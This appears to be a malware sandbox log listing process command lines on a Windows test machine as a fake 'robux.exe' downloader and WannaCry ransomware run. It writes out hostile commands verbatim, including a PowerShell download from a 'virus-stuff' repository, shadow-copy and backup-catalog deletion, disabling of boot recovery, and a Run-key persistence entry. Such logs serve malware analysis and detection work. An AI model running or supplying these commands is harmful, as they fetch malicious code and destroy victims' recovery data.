"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6640 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6776 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\robux.exe

"C:\Users\Admin\Downloads\robux.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\63C7.tmp\63D8.tmp\63D9.bat C:\Users\Admin\Downloads\robux.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"

C:\Users\Admin\Downloads\robux.exe

"C:\Users\Admin\Downloads\robux.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81A0.tmp\81A1.tmp\81A2.bat C:\Users\Admin\Downloads\robux.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6004 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6148 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8

C:\Users\Admin\Downloads\MBSetup.exe

"C:\Users\Admin\Downloads\MBSetup.exe"

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"

C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe" /installmbtun

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "9" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf" "9" "4ba9030c7" "0000000000000148" "Service-0x0-3e7$\Default" "0000000000000158" "208" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun"

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe" nowindow

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe

"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2532 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5624 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6728 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6624 /prefetch:2

C:\Users\Admin\Downloads\WannaCry.EXE

"C:\Users\Admin\Downloads\WannaCry.EXE"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 92371711322109.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\@[email protected]

@[email protected] vs

C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hijlbxdnsg426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hijlbxdnsg426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status on true /updatesubstatus none /scansubstatus none /settingssubstatus none

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\AppData\LocalLow\IGDump\jewzhlkrnqyathxklnydxjzurgkqaubq\ig.exe

ig.exe timer 4000 sqytmuflycrkftyiomlmctrbnyjsqfxx.ext

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\LocalLow\IGDump\ermwdkqkmvirqsylfzwcpextxxzqrhza\ig.exe

ig.exe timer 4000 yphwqepbjsqxzuobzevinftoebvzbumw.ext

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

